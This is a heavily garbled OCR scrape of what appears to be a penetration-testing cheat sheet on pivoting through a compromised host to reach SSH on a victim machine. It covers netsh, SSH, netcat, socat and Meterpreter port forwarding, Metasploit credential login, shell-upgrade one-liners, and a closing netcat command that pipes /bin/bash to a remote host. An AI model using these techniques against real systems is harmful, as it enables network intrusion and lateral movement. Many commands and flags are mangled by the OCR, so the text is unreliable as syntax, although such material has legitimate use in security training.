eed
pivot netsh interface
portproxy add vatov4
Listenport=4000
Listenaddress=0.0.0.0
connectport=22
connectaddres
er 9 gh
victimadmin@pivot. tgt
victim. tgt
Ce ea)
‘SH tral through Linux
ker s sah
pivotAdmingpivot.tgt
pL ssh
victimAdmingvictim. tgt
PowerShell sessions through Windows:
2 P Enter-
PsSession ~CouputerNane
pivot. tgt
(r ROP session over Windows
Iv:Pivot.tgt
psexec.exe
Now, with command execution on pivot:
ivot ash
victimadminvictim, tgt
No SSH available? How about PUTTY?
Note that even if all the host in the chain
run Windows, you ean’ typically sSession
twvice because of how credentials are used.
Run asearch for pesession double
for more info
Cee)
python -c ‘import pty;
pty. spawn("/bin/bash")
ruby -e ‘exec "/bin/sh"
Mbin/sh ~i or /bin/bash ~i
perl -e ‘exec "/bin/sh’
Further Upgrade Ugly Shells
Things seem off? Sometimes this can return
functionality like arcow keys in a shell
° z
5 stty raw -echo
er 3 fg
9 reset
export. SHELL=bash
9 export TERM=xtern-
stty rows 40 columns
eee
ssion -S hacking
Session fais
Regain session, THEN:
oti § session -r hacking
Want mote fu >
jonality than s
Check out tm
Is your connection not stable enough for
7 mosth is more forgiving of spotty
Manage Many SSH Connections
Check out Pronylump and.
manage a wide array of
connections
a) fale
QS oP ERATIONS
a Gene)
Ny Wick
i
Purpose
Navigating a clent/vitim environment often
requires pivoting from target to target, and
there are many ways to do so. This cheat
sheet runs through various options for
Giferent environments and situations.
Find @ method that may fit your situation. In
each, we model an attacker pivoting through
pivot to reach SSH on victim. Substitute
hosts ané ports to ft your need,
Pay attention to prompts as they will identify
the hast where the command should be run
AND what type of prompt, ie. Windows
cmd.exe (c: \>), Powershell (23), or Linux
(5 or ). The diagram in the center should
help.
Replace termslike victimAdmin and
ict with appropriate credentials
forthe given system.
On the back, there are some extra goodies
like how to upgrade an ugly Neteat shel to
something that feels more ikea eal Bash
Have fun, good luck, and pivot mercilessly!SsHPvotsRequireansshdseting [PStustion BL MaterpreterPor Forward
SetGatewayPorts yes in
4g, then)
t # systemctl restart sshd
Ere)
setackes $ ash ~£NL
1337 :victim. tot :22
pivoterépivot.tgt
stacker § ssh
victimadmintlocalhost -P 1337
Snr)
iyot § eh -£NR
1337:victim. tgt:22
attackerGattacker.tgt
seeackes $ aah
victimadnin@localhost -P 1337
ker § ssh
pivotadningpivot.tgt -D 9050 -
6
attacks: $ proxychains ash
victimadmintvictin. tgt
And check /etc/proxychais £
peer ee an
=£ put ssh in the background after
connecting
-¥ don’t
some ports
=P. num use “num” port for ssh
ecute a command; just forward
You need to access SSH on port 22 of victim,
but you can’t go directly due to those
meddling firewalls. For simplicity, thls sheet
will generally be using ports 1337, 4000, and
22 on the Attacker, Pwot, and Victim
machines
victim.tgt
citi =?
pivot.tgt
| 0 |
attacker.tgt
Netcat Port Forward
Sed /tmp && mknod
backpipe Pp
i ne -1vp 4000
Ocbackpipe | no -v victim.tgt
22 L>backpipe
acker $ ssh
victimadningpivot.tgt -P 4000
Tr Meterpreter > port fwd
add -1 4000 -p 22 -r
victim, tgt
ker § seh
victimadmingpivot.tgt -P 4000
Ree es
pivot Meter un
post/multi /manage/autoroute
SUBNET=pivotSubnet CMD=add
pivot Ustezpreter > background
scanner/ssh/ssh_login
set RHOSTS
victim. tgt
P set USERNAME
victimadmin
pivot msf > set PASSWORD
victimPase
Senior)
pivot § socat TCP-
LISTEN: 4000, fork
‘Tep:victim. tgt:22
er 9 sh
victimadmingpivet.tgt -P 4000
ear
‘Assumes code execution on victim
y t vip 4
it neat pivot. tgt 4000 -
[oin/bash
neat pivot.tgt 4000